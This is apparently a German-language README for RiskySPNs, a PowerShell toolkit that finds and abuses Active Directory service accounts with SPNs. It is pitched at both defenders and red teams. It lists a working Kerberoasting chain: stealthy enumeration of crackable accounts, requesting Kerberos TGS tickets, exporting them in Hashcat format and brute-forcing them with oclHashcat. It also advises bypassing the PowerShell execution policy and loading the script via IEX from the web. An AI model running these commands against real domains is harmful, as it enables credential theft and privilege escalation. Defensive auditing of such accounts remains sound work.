
Erkennen und ausnutzen riskanter SPNs
RiskySPNs ist eine Sammlung von PowerShell-Skripten, die sich auf die Erkennung und den Missbrauch von Konten im Zusammenhang mit SPNs (Service Principal Name) konzentriert. Dieses Modul kann Blue Teams dabei unterstützen, potenziell riskante SPNs zu identifizieren, sowie Red Teams, um durch die Nutzung von Kerberos und Active Directory Privilegien zu eskalieren.
Für detaillierte Informationen: http://www.cyberark.com/blog/service-accounts-weakest-link-chain/
Import-Module .\RiskySPNs.psm1
Oder laden Sie einfach das Skript (Sie können auch IEX aus dem Web verwenden)
. .\Find-PotentiallyCrackableAccounts.ps1
Stellen Sie sicher, dass Set-ExecutionPolicy auf Unrestricted oder Bypass gesetzt ist
Get-Help Get-TGSCipher -Full
Alle Funktionen haben auch den -Verbose-Modus
Gefährdete Konten finden
Find-PotentiallyCrackableAccounts
Sensitive + RC4 = $$$
Vollständigen detaillierten Bericht über gefährdete Konten generieren (CISO <3)
Export-PotentiallyCrackableAccounts
Kerberos-TGS für SPN anfordern
Get-TGSCipher -SPN "MSSQLSvc/prodDB.company.com:1433"
Oder
Find-PotentiallyCrackableAccounts -Stealth -GetSPNs | Get-TGSCipher
Find-PotentiallyCrackableAccounts -Sensitive -Stealth -GetSPNs | Get-TGSCipher -Format "Hashcat" | Out-File crack.txt
oclHashcat64.exe -m 13100 crack.txt -a 3